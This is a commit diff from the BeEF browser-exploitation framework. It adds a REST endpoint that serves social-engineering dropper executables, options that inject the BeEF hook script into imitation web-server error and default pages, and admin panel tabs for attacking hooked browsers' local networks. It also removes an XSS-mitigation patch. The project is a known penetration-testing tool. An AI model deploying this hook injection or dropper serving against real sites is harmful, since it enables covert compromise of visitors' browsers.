arch = body['arch']
hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
error 401 unless hb != nil
BeEF::Core::Models::BrowserDetails.first(:session_id => hb.session, :detail_key => 'OsName').destroy
BeEF::Core::Models::BrowserDetails.first(:session_id => hb.session, :detail_key => 'OsVersion').destroy
#BeEF::Core::Models::BrowserDetails.first(:session_id => hb.session, :detail_key => 'Arch').destroy
BeEF::Core::Models::BrowserDetails.new(:session_id => hb.session, :detail_key => 'OsName', :detail_value => os).save
BeEF::Core::Models::BrowserDetails.new(:session_id => hb.session, :detail_key => 'OsVersion', :detail_value => os_version).save
BeEF::Core::Models::BrowserDetails.new(:session_id => hb.session, :detail_key => 'Arch', :detail_value => arch).save
#TODO if there where any ARE rules defined for this hooked browser, after updating OS/arch, force a retrigger of the rule.
{'success' => true}.to_json
end
def hb_to_json(hbs)
hbs_hash = {}
i = 0
@@ -139,6 +162,7 @@ module BeEF
'name' => details.get(hb.session, 'BrowserName'),
'version' => details.get(hb.session, 'BrowserVersion'),
'os' => details.get(hb.session, 'OsName'),
'os_version' => details.get(hb.session, 'OsVersion'),
'platform' => details.get(hb.session, 'BrowserPlatform'),
'ip' => hb.ip,
'domain' => details.get(hb.session, 'HostName'),
@@ -149,27 +173,33 @@ module BeEF
# this is used in the 'get '/pf'' restful api call
def hbs_to_array(hbs)
hbs_online = []
hooked_browsers = []
hbs.each do |hb|
details = BeEF::Core::Models::BrowserDetails
# TODO jQuery.dataTables needs fixed array indexes, add emptry string if a value is blank
hbs_online << [
pfuid = details.get(hb.session, 'PhishingFrenzyUID') != nil ? details.get(hb.session, 'PhishingFrenzyUID') : 'n/a'
bname = details.get(hb.session, 'BrowserName') != nil ? details.get(hb.session, 'BrowserName') : 'n/a'
bversion = details.get(hb.session, 'BrowserVersion') != nil ? details.get(hb.session, 'BrowserVersion') : 'n/a'
bplugins = details.get(hb.session, 'BrowserPlugins') != nil ? details.get(hb.session, 'BrowserPlugins') : 'n/a'
hooked_browsers << [
hb.id,
hb.ip,
details.get(hb.session, 'PhishingFrenzyUID'),
details.get(hb.session, 'BrowserName'),
details.get(hb.session, 'BrowserVersion'),
pfuid,
bname,
bversion,
details.get(hb.session, 'OsName'),
details.get(hb.session, 'BrowserPlatform'),
details.get(hb.session, 'BrowserLanguage'),
details.get(hb.session, 'BrowserPlugins'),
bplugins,
details.get(hb.session, 'LocationCity'),
details.get(hb.session, 'LocationCountry'),
details.get(hb.session, 'LocationLatitude'),
details.get(hb.session, 'LocationLongitude')
]
end
hbs_online
hooked_browsers
end
end

18
core/main/rest/handlers/server.rb
View File

@@ -23,14 +23,28 @@ module BeEF
# @note Binds a local file to a specified path in BeEF's web server
# Note: 'local_file' expects a file from the /extensions/social_engineering/droppers directory.
# Example usage:
# curl -H "Content-Type: application/json; charset=UTF-8" -d '{"mount":"/dropper","local_file":"dropper.exe"}'
# -X POST -v http://10.0.60.10/api/server/bind?token=xyz
post '/bind' do
request.body.rewind
begin
data = JSON.parse request.body.read
mount = data['mount']
local_file = data['local_file']
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(local_file, mount)
status 200
droppers_dir = File.expand_path('..', __FILE__) + "/../../../../extensions/social_engineering/droppers/"
if File.exists?(droppers_dir + local_file) && Dir.entries(droppers_dir).include?(local_file)
f_ext = File.extname(local_file).gsub('.','')
f_ext = nil if f_ext.empty?
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind("/extensions/social_engineering/droppers/#{local_file}", mount, f_ext)
status 200
else
halt 400
end
rescue => e
error 400
end

9
core/main/router/router.rb
View File

@@ -32,6 +32,7 @@ module BeEF
"<p>The requested URL was not found on this server.</p>" +
"<hr>" +
"<address>Apache/2.2.3 (CentOS)</address>" +
("<script src='#{config.get("beef.http.hook_file")}'></script>" if config.get("beef.http.web_server_imitation.hook_404")).to_s +
"</body></html>"
when "iis"
#response body
@@ -65,7 +66,9 @@ module BeEF
"<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr)," +
"and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>" +
"</ul>" +
"</TD></TR></TABLE></BODY></HTML>"
"</TD></TR></TABLE>" +
("<script src='#{config.get("beef.http.hook_file")}'></script>" if config.get("beef.http.web_server_imitation.hook_404")).to_s +
"</BODY></HTML>"
when "nginx"
#response body
"<html>\n"+
@@ -73,6 +76,7 @@ module BeEF
"<body bgcolor=\"white\">\n" +
"<center><h1>404 Not Found</h1></center>\n" +
"<hr><center>nginx</center>\n" +
("<script src='#{config.get("beef.http.hook_file")}'></script>" if config.get("beef.http.web_server_imitation.hook_404")).to_s +
"</body>\n" +
"</html>\n"
else
@@ -235,6 +239,7 @@ module BeEF
"<p><a href=\"http://www.internic.net/whois.html\">http://www.internic.net/whois.html</a></p>" +
"</div>" +
"</div>" +
("<script src='#{config.get("beef.http.hook_file")}'></script>" if config.get("beef.http.web_server_imitation.hook_root")).to_s +
"</body>" +
"</html>"
when "iis"
@@ -265,6 +270,7 @@ module BeEF
"</td>" +
"</tr>" +
"</table>" +
("<script src='#{config.get("beef.http.hook_file")}'></script>" if config.get("beef.http.web_server_imitation.hook_root")).to_s +
"</body>" +
"</html>"
when "nginx"
@@ -289,6 +295,7 @@ module BeEF
"Commercial support is available at\n" +
"<a href=\"http://nginx.com/\">nginx.com</a>.</p>\n\n" +
"<p><em>Thank you for using nginx.</em></p>\n" +
("<script src='#{config.get("beef.http.hook_file")}'></script>" if config.get("beef.http.web_server_imitation.hook_root")).to_s +
"</body>\n" +
"</html>\n"
else

2
core/main/server.rb
View File

@@ -127,7 +127,7 @@ module BeEF
@http_server.start # starts the web server
rescue RuntimeError => e
if e.message =~ /no acceptor/ # the port is in use
print_error "Another process is already listening on port #{@configuration.get('beef.http.port')}."
print_error "Another process is already listening on port #{@configuration.get('beef.http.port')}, or you're trying to bind BeEF to an invalid IP."
print_error "Is BeEF already running? Exiting..."
exit 127
else

3
core/ruby.rb
View File

@@ -7,9 +7,6 @@
# @note Patching Ruby Security
require 'core/ruby/security'
# @note Patching Rack File class to prevent a potential XSS
require 'core/ruby/file.rb'
# @note Patching Ruby
require 'core/ruby/module'
require 'core/ruby/object'

44
core/ruby/file.rb
View File

@@ -1,44 +0,0 @@
require 'time'
require 'rack/utils'
require 'rack/mime'
module Rack
class File
def _call(env)
unless ALLOWED_VERBS.include? env["REQUEST_METHOD"]
return fail(405, "Method Not Allowed")
end
@path_info = Utils.unescape(env["PATH_INFO"])
parts = @path_info.split SEPS
parts.inject(0) do |depth, part|
case part
when '', '.'
depth
when '..'
return fail(404, "Not Found") if depth - 1 < 0
depth - 1
else
depth + 1
end
end
@path = F.join(@root, *parts)
available = begin
F.file?(@path) && F.readable?(@path)
rescue SystemCallError
false
end
if available
serving(env)
else
# this is the patched line. No need to reflect the URI path, potential XSS
# exploitable if you can bypass the Content-type: text/plain (IE MHTML and tricks like that)
fail(404, "File not found")
end
end
end
end

4
core/ruby/security.rb
View File

@@ -12,8 +12,8 @@ end
# @note Prevent system from ever being used
def system(args)
puts "For security reasons the system method is not accepted in the Browser Exploitation Framework code base."
exit
puts "For security reasons the system method is not accepted in the Browser Exploitation Framework code base."
exit
end
# @note Prevent Kernel.system from ever being used

11
extensions/admin_ui/api/handler.rb
View File

@@ -33,7 +33,7 @@ module API
#NOTE: order counts! make sure you know what you're doing if you add files
esapi = %w(esapi/Class.create.js esapi/jquery-1.6.4.min.js esapi/jquery-encoder-0.1.0.js)
ux = %w(ui/common/beef_common.js ux/PagingStore.js ux/StatusBar.js ux/TabCloseMenu.js)
panel = %w(ui/panel/common.js ui/panel/DistributedEngine.js ui/panel/PanelStatusBar.js ui/panel/tabs/ZombieTabDetails.js ui/panel/tabs/ZombieTabLogs.js ui/panel/tabs/ZombieTabCommands.js ui/panel/tabs/ZombieTabRider.js ui/panel/tabs/ZombieTabXssRays.js wterm/wterm.jquery.js ui/panel/tabs/ZombieTabIpec.js ui/panel/tabs/ZombieTabAutorun.js ui/panel/PanelViewer.js ui/panel/DataGrid.js ui/panel/MainPanel.js ui/panel/ZombieTab.js ui/panel/ZombieTabs.js ui/panel/zombiesTreeList.js ui/panel/ZombiesMgr.js ui/panel/Logout.js ui/panel/WelcomeTab.js ui/panel/ModuleSearching.js)
panel = %w(ui/panel/common.js ui/panel/DistributedEngine.js ui/panel/PanelStatusBar.js ui/panel/tabs/ZombieTabDetails.js ui/panel/tabs/ZombieTabLogs.js ui/panel/tabs/ZombieTabCommands.js ui/panel/tabs/ZombieTabRider.js ui/panel/tabs/ZombieTabXssRays.js wterm/wterm.jquery.js ui/panel/tabs/ZombieTabIpec.js ui/panel/tabs/ZombieTabAutorun.js ui/panel/PanelViewer.js ui/panel/DataGrid.js ui/panel/MainPanel.js ui/panel/ZombieTab.js ui/panel/ZombieTabs.js ui/panel/zombiesTreeList.js ui/panel/ZombiesMgr.js ui/panel/tabs/ZombieTabNetwork.js ui/panel/tabs/ZombieTabRTC.js ui/panel/Logout.js ui/panel/WelcomeTab.js ui/panel/ModuleSearching.js)
global_js = esapi + ux + panel
@@ -86,19 +86,16 @@ module API
media_dir = File.dirname(__FILE__)+'/../media/'
beef_server.mount("#{bp}/media", Rack::File.new(media_dir))
# mount the favicon file, if we're not imitating a web server.
if !config.get("beef.http.web_server_imitation.enable")
beef_server.mount('/favicon.ico', Rack::File.new("#{media_dir}#{config.get("beef.extension.admin_ui.favicon_dir")}/#{config.get("beef.extension.admin_ui.favicon_file_name")}"))
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(
"/extensions/admin_ui/media#{config.get("beef.extension.admin_ui.favicon_dir")}/#{config.get("beef.extension.admin_ui.favicon_file_name")}",
'/favicon.ico', 'ico')
end
self.build_javascript_ui beef_server
end
end
end
end
end

4
extensions/admin_ui/controllers/authentication/authentication.rb
View File

@@ -73,7 +73,7 @@ class Authentication < BeEF::Extension::AdminUI::HttpController
session_cookie_name = config.get('beef.http.session_cookie_name') # get session cookie name
Rack::Utils.set_cookie_header!(@headers, session_cookie_name, {:value => @session.get_id, :path => "/", :httponly => true})
BeEF::Core::Logger.instance.register('Authentication', "User with ip #{@request.ip} has successfuly authenticated in the application.")
BeEF::Core::Logger.instance.register('Authentication', "User with ip #{@request.ip} has successfully authenticated in the application.")
@body = "{ success : true }"
end
@@ -96,7 +96,7 @@ class Authentication < BeEF::Extension::AdminUI::HttpController
session_cookie_name = config.get('beef.http.session_cookie_name') # get session cookie name
Rack::Utils.set_cookie_header!(@headers, session_cookie_name, {:value => "", :path => "/", :httponly => true, expires: Time.now})
BeEF::Core::Logger.instance.register('Authentication', "User with ip #{@request.ip} has successfuly logged out.")
BeEF::Core::Logger.instance.register('Authentication', "User with ip #{@request.ip} has successfully logged out.")
@body = "{ success : true }"
end

2
extensions/admin_ui/controllers/modules/modules.rb
View File

@@ -83,13 +83,11 @@ class Modules < BeEF::Extension::AdminUI::HttpController
['Browser Components', 'VBScript', 'VBScriptEnabled'],
['Browser Components', 'PhoneGap', 'HasPhonegap'],
['Browser Components', 'Google Gears', 'HasGoogleGears'],
['Browser Components', 'Silverlight', 'HasSilverlight'],
['Browser Components', 'Web Sockets', 'HasWebSocket'],
['Browser Components', 'QuickTime', 'HasQuickTime'],
['Browser Components', 'RealPlayer', 'HasRealPlayer'],
['Browser Components', 'Windows Media Player','HasWMP'],
['Browser Components', 'VLC', 'HasVLC'],
['Browser Components', 'Foxit Reader', 'HasFoxit'],
['Browser Components', 'WebRTC', 'HasWebRTC'],
['Browser Components', 'ActiveX', 'HasActiveX'],
['Browser Components', 'Session Cookies', 'hasSessionCookies'],

7
extensions/admin_ui/controllers/panel/index.html
View File

@@ -12,8 +12,9 @@
<%= script_tag 'ext-base.js' %>
<%= script_tag 'ext-all.js' %>
<%= script_tag_min 'web_ui_all.js' %>
<%= stylesheet_tag 'wterm.css' %>
<%= script_tag 'vis.js/vis.min.js' %>
<%= script_tag_min 'web_ui_all.js' %>
<%= stylesheet_tag 'wterm.css' %>
<%= stylesheet_tag 'ext-all.css' %>
<%= stylesheet_tag 'base.css' %>
</head>
@@ -24,7 +25,7 @@
<div class="left-menu" id="header-right">
</div>
<div class="right-menu">
<img src="<%= base_path %>/media/images/favicon.ico" alt="BeEF" title="BeEF" />
<img src="<%= base_path %>/media/images/favicon.png" />
BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> |
<a id='do-submit-bug-menu' href='https://github.com/beefproject/beef/issues/new' target='_blank'>Submit Bug</a> |
<a id='do-logout-menu' href='#'>Logout</a>

7
extensions/admin_ui/controllers/panel/panel.rb
View File

@@ -89,11 +89,9 @@ module BeEF
has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
has_webrtc = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebRTC')
has_activex = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX')
has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
has_quicktime = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
has_realplayer = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasRealPlayer')
has_wmp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWMP')
has_foxit = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFoxit')
date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
return {
@@ -113,12 +111,11 @@ module BeEF
'has_googlegears' => has_googlegears,
'has_webrtc' => has_webrtc,
'has_activex' => has_activex,
'has_silverlight' => has_silverlight,
'has_quicktime' => has_quicktime,
'has_wmp' => has_wmp,
'has_foxit' => has_foxit,
'has_realplayer' => has_realplayer,
'date_stamp' => date_stamp
'date_stamp' => date_stamp,
'hb_id' => hooked_browser.id
}
end

76
extensions/admin_ui/media/css/base.css
View File

@@ -80,6 +80,12 @@
background-image: url(../images/icons/xssrays.png);
}
.zombie-tree-ctxMenu-rtc {
background-image: url(../images/icons/network.png);
background-size: 24px 24px;
background-repeat: no-repeat;
}
.zombie-tree-ctxMenu-delete {
background-image: url(../images/icons/delete.png);
background-size: 32px 32px;
@@ -93,6 +99,76 @@
padding-top: 3px;
}
/*
* Network Panel
****************************************/
.network-host-ctxMenu-config {
background-image: url(../images/icons/tools.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-host {
background-image: url(../images/icons/pc.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-network {
background-image: url(../images/icons/network.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-web {
background-image: url(../images/icons/web.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-adapter {
background-image: url(../images/icons/adapter.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-router {
background-image: url(../images/icons/router.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-proxy {
background-image: url(../images/icons/proxy.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-fingerprint {
background-image: url(../images/icons/magnifier.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-cors {
background-image: url(../images/icons/cors.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-shellshock {
background-image: url(../images/icons/shellshock.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
.network-host-ctxMenu-php {
background-image: url(../images/icons/php.png);
background-size: 16px 16px;
background-repeat: no-repeat;
}
/*
* Ext.beef.msg
****************************************/

BIN
extensions/admin_ui/media/images/favicon.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 906 B

BIN
extensions/admin_ui/media/images/icons/Apps-internet-web-browser-icon.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 17 KiB

BIN
extensions/admin_ui/media/images/icons/Hardware-Printer-Blue-icon.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 16 KiB

BIN
extensions/admin_ui/media/images/icons/Network-Drive-icon.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 14 KiB

BIN
extensions/admin_ui/media/images/icons/Network-Pipe-icon.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 3.4 KiB

BIN
extensions/admin_ui/media/images/icons/System-Firewall-2-icon.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 65 KiB

BIN
extensions/admin_ui/media/images/icons/adapter.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.2 KiB

BIN
extensions/admin_ui/media/images/icons/cors.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.5 KiB

BIN
extensions/admin_ui/media/images/icons/magnifier.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.5 KiB

BIN
extensions/admin_ui/media/images/icons/network.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 45 KiB

BIN
extensions/admin_ui/media/images/icons/pc.png
View File

Binary file not shown.
Side by Side Swipe Overlay

Before

Width:  |  Height:  |  Size: 2.5 KiB

After

Width:  |  Height:  |  Size: 1.8 KiB

BIN
extensions/admin_ui/media/images/icons/php.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.2 KiB

BIN
extensions/admin_ui/media/images/icons/proxy.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 12 KiB

BIN
extensions/admin_ui/media/images/icons/router.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.0 KiB

BIN
extensions/admin_ui/media/images/icons/shellshock.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.8 KiB

BIN
extensions/admin_ui/media/images/icons/sunos.gif Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.4 KiB

BIN
extensions/admin_ui/media/images/icons/tools.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 2.3 KiB

BIN
extensions/admin_ui/media/images/icons/web.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.7 KiB

103
extensions/admin_ui/media/javascript/ui/common/beef_common.js
View File

@@ -13,6 +13,7 @@ if(typeof beefwui === 'undefined' && typeof window.beefwui === 'undefined') {
var BeefWUI = {
rest_token: "",
hooked_browsers: {},
/**
* Retrieve the token needed to call the RESTful API.
@@ -37,7 +38,107 @@ if(typeof beefwui === 'undefined' && typeof window.beefwui === 'undefined') {
});
}
return this.rest_token;
}
},
/**
* Get hooked browser ID from session
*/
get_hb_id: function(sess){
var id = "";
$jwterm.ajax({
type: 'GET',
url: "/api/hooks/?token=" + this.get_rest_token(),
async: false,
processData: false,
success: function(data){
for (var k in data['hooked-browsers']['online']) {
if (data['hooked-browsers']['online'][k].session === sess) {
id = data['hooked-browsers']['online'][k].id;
}
}
if (id === "") {
for (var k in data['hooked-browsers']['offline']) {
if (data['hooked-browsers']['offline'][k].session === sess) {
id = data['hooked-browsers']['offline'][k].id;
}
}
}
},
error: function(){
commands_statusbar.update_fail("Error getting hb id");
}
});
return id;
},
/**
* Get hooked browser info from ID
*/
get_info_from_id: function(id) {
var info = {};
$jwterm.ajax({
type: 'GET',
url: "/api/hooks/?token=" + this.get_rest_token(),
async: false,
processData: false,
success: function(data){
for (var k in data['hooked-browsers']['online']) {
if (data['hooked-browsers']['online'][k].id === id) {
info = data['hooked-browsers']['online'][k];
}
}
if ($jwterm.isEmptyObject(info)) {
for (var k in data['hooked-browsers']['offline']) {
if (data['hooked-browsers']['offline'][k].id === id) {
info = data['hooked-browsers']['offline'][k];
}
}
}
},
error: function(){
commands_statusbar.update_fail("Error getting hb ip");
}
});
console.log(info);
return info;
},
/**
* Get hooked browser info from ID
*/
get_fullinfo_from_id: function(id) {
var info = {};
$jwterm.ajax({
type: 'POST',
url: "<%= @base_path %>/panel/hooked-browser-tree-update.json",
async: false,
processData: false,
success: function(data){
for (var k in data['hooked-browsers']['online']) {
if (data['hooked-browsers']['online'][k].id === id) {
info = data['hooked-browsers']['online'][k];
}
}
if ($jwterm.isEmptyObject(info)) {
for (var k in data['hooked-browsers']['offline']) {
if (data['hooked-browsers']['offline'][k].id === id) {
info = data['hooked-browsers']['offline'][k];
}
}
}
},
error: function(){
commands_statusbar.update_fail("Error getting hb ip");
}
});
console.log(info);
return info;
}
};
window.beefwui = BeefWUI;

155
extensions/admin_ui/media/javascript/ui/panel/HackVertorTab.js
View File

@@ -1,155 +0,0 @@
//
// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
HackVertorTab = function() {
/*
* The panel used to encode/decode text.
********************************************/
var hackvertor_panel = new Ext.FormPanel({
title: 'HackVertor',
id: 'hackvertor-panel',
hideLabels : false,
border: false,
padding: '3px 5px 0 5px',
items:[{
fieldLabel: 'Text',
xtype: 'textarea',
id: 'inputText',
name: 'inputText',
width: '100%',
height: '40%',
allowBlank: true
},{
fieldLabel: 'Result',
xtype: 'textarea',
id: 'resultText',
name: 'resultText',
width: '100%',
height: '40%',
allowBlank: true
}],
buttons: [{
text: 'Encode',
handler: function() {
var form = Ext.getCmp('hackvertor-panel').getForm();
var form_values = form.getValues();
var input_text = form_values['inputText'];
var result="";
switch (form_values['decodeType']) {
case "base64":
break;
case "rot13":
result = input_text.replace(/[a-zA-Z]/g, function(c){return String.fromCharCode((c <= "Z" ? 90 : 122) >= (c = c.charCodeAt(0) + 13) ? c : c - 26);});
break;
case "addslashes":
result = input_text.replace(/[\\"']/g, '\\$&').replace(/\u0000/g, '\\0');
break;
case "stripslashes":
result = input_text.replace(/\\(.?)/g, function (s, n1) {switch (n1) {case '\\':return '\\';case '0':return '\u0000';case '':return '';default:return n1;}});
break;
case "reverse":
break;
case "escape":
result = escape(input_text);
break;
case "unescape":
result = unescape(input_text);
break;
case "encodeuri":
result = encodeURI(input_text);
break;
case "decodeuri":
result = decodeURI(input_text);
break;
default:
}
form.setValues({resultText: result});
}
},{
text: 'Decode',
handler: function() {
var form = Ext.getCmp('hackvertor-panel').getForm();
var form_values = form.getValues();
var input_text = form_values['inputText'];
var result="";
switch (form_values['decodeType']) {
case "base64":
break;
case "rot13":
result = input_text.replace(/[a-zA-Z]/g, function(c){return String.fromCharCode((c <= "Z" ? 90 : 122) >= (c = c.charCodeAt(0) + 13) ? c : c - 26);});
break;
case "addslashes":
result = input_text.replace(/[\\"']/g, '\\$&').replace(/\u0000/g, '\\0');
break;
case "stripslashes":
result = input_text.replace(/\\(.?)/g, function (s, n1) {switch (n1) {case '\\':return '\\';case '0':return '\u0000';case '':return '';default:return n1;}});
break;
case "reverse":
break;
case "escape":
result = escape(input_text);
break;
case "unescape":
result = unescape(input_text);
break;
case "encodeuri":
result = encodeURI(input_text);
break;
case "decodeuri":
result = decodeURI(input_text);
break;
default:
}
form.setValues({resultText: result});
}
}]
});
decode_combo = new Ext.form.ComboBox({
name: 'decodeType',
disableKeyFilter: false,
fieldLabel: 'Type',
forceSelection: true,
emptyText: '--select--',
triggerAction: 'all',
mode: 'local',
store: new Ext.data.SimpleStore({
id: 0,
fields: ['value', 'text'],
data: [
//['base64', 'Base64'],
//['reverse', 'Reverse'],
['rot13', 'Rot13'],
//['fromcharcode', 'String.fromCharCode'],
['addslashes', 'Add Slashes'],
['stripslashes', 'Strip Slashes'],
['escape', 'escape()'],
['unescape', 'unescape()'],
['encodeuri', 'encodeURI()'],
['decodeuri', 'decodeURI()']
]
}),
valueField: 'value',
displayField: 'text',
hiddenName: 'decodeType'
});
hackvertor_panel.add(decode_combo);
HackVertorTab.superclass.constructor.call(this, {
region: 'center',
items: [hackvertor_panel],
autoScroll: true,
border: false
});
};
Ext.extend(HackVertorTab,Ext.Panel, {});

18
extensions/admin_ui/media/javascript/ui/panel/MainPanel.js
View File

@@ -32,8 +32,6 @@ MainPanel = function(){
this.grid = new DataGrid('<%= @base_path %>/logs/all.json',30);
this.grid.border = false;
this.welcome_tab = new WelcomeTab;
//this.hooks_tab = new HooksTab;
//this.hackvertor_tab = new HackVertorTab;
MainPanel.superclass.constructor.call(this, {
id:'main-tabs',
@@ -62,22 +60,6 @@ MainPanel = function(){
hideMode:'offsets',
items:[
this.grid
/*
]},{
id:'hooks-view',
layout:'border',
title:'Hooks',
hideMode:'offsets',
items:[
//this.hooks_tab
]},{
id:'hackvertor-view',
layout:'border',
title:'HackVertor',
hideMode:'offsets',
items:[
//this.hackvertor_tab
*/
]
}]
});

3
extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js
View File

@@ -59,6 +59,7 @@ Ext.TaskMgr.start({
hr.innerHTML = "You appear to be logged out. <a href='<%= @base_path %>/panel/'>Login</a>";
}
var distributed_engine_rules = (updates['ditributed-engine-rules']) ? updates['ditributed-engine-rules'] : null;
beefwui.hooked_browsers = (updates['hooked-browsers']); //? updates['hooked-browsers'] : null;
var hooked_browsers = (updates['hooked-browsers']) ? updates['hooked-browsers'] : null;
if(zombiesManager && hooked_browsers) {
@@ -80,4 +81,4 @@ Ext.TaskMgr.start({
},
interval: 8000
});
});

3
extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
View File

@@ -35,7 +35,8 @@ WelcomeTab = function() {
<li><img alt='' src='media/images/icons/red.png' unselectable='on'> The command module does not work against this target</li></ul><br />\
<li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>XssRays:</span> The XssRays tab allows the user to check if links, forms and URI path of the page (where the browser is hooked) is vulnerable to XSS.</li> \
<li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>Rider:</span> The Rider tab allows you to submit arbitrary HTTP requests on behalf of the hooked browser. \
Each request sent by the Rider is recorded in the History panel. Click a history item to view the HTTP headers and HTML source of the HTTP response.</li></ul><br />\
Each request sent by the Rider is recorded in the History panel. Click a history item to view the HTTP headers and HTML source of the HTTP response.</li> \
<li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>Network:</span> The Network tab allows you to interact with hosts on the local network(s) of the hooked browser.</li></ul><br /> \
<p>You can also right-click a hooked browser to open a context-menu with additional functionality:</p><br /> \
<ul style=\"margin-left:15px;\">\
<li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>Tunneling Proxy:</span> The Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\". \

27
extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
View File

@@ -9,27 +9,30 @@ ZombieTab = function(zombie) {
log_tab = new ZombieTab_LogTab(zombie);
commands_tab = new ZombieTab_Commands(zombie);
requester_tab = new ZombieTab_Requester(zombie);
xssrays_tab = new ZombieTab_XssRaysTab(zombie);
ipec_tab = new ZombieTab_IpecTab(zombie);
autorun_tab = new ZombieTab_Autorun(zombie);
xssrays_tab = new ZombieTab_XssRaysTab(zombie);
ipec_tab = new ZombieTab_IpecTab(zombie);
autorun_tab = new ZombieTab_Autorun(zombie);
network_tab = new ZombieTab_Network(zombie);
rtc_tab = new ZombieTab_Rtc(zombie);
ZombieTab.superclass.constructor.call(this, {
id:"current-browser",
id:"current-browser",
activeTab: 0,
loadMask: {msg:'Loading browser...'},
title: "Current Browser",
title: "Current Browser",
autoScroll: true,
closable: false,
viewConfig: {
forceFit: true,
type: 'fit'
},
items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab, ipec_tab, autorun_tab],
listeners:{
afterrender:function(component){
// Hide auto-run tab
component.hideTabStripItem(autorun_tab);
}
}
items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab, ipec_tab, autorun_tab, network_tab, rtc_tab],
listeners:{
afterrender:function(component){
// Hide auto-run tab
component.hideTabStripItem(autorun_tab);
}
}
});
};

6
extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
View File

@@ -29,11 +29,10 @@ var ZombiesMgr = function(zombies_tree_lists) {
var has_webrtc = zombie_array[index]["has_webrtc"];
var has_activex = zombie_array[index]["has_activex"];
var has_wmp = zombie_array[index]["has_wmp"];
var has_foxit = zombie_array[index]["has_foxit"];
var has_silverlight = zombie_array[index]["has_silverlight"];
var has_quicktime = zombie_array[index]["has_quicktime"];
var has_realplayer = zombie_array[index]["has_realplayer"];
var date_stamp = zombie_array[index]["date_stamp"];
var hb_id = zombie_array[index]["hb_id"];
text = "<img src='<%= @base_path %>/media/images/icons/"+escape(browser_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text+= "<img src='<%= @base_path %>/media/images/icons/"+escape(os_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
@@ -49,10 +48,8 @@ var ZombiesMgr = function(zombies_tree_lists) {
balloon_text+= "<br/>Web Sockets: " + has_web_sockets;
balloon_text+= "<br/>WebRTC: " + has_webrtc;
balloon_text+= "<br/>ActiveX: " + has_activex;
balloon_text+= "<br/>Silverlight: " + has_silverlight;
balloon_text+= "<br/>QuickTime: " + has_quicktime;
balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp;
balloon_text+= "<br/>Foxit: " + has_foxit;
balloon_text+= "<br/>RealPlayer: " + has_realplayer;
balloon_text+= "<br/>Google Gears: " + has_googlegears;
balloon_text+= "<br/>Date: " + date_stamp;
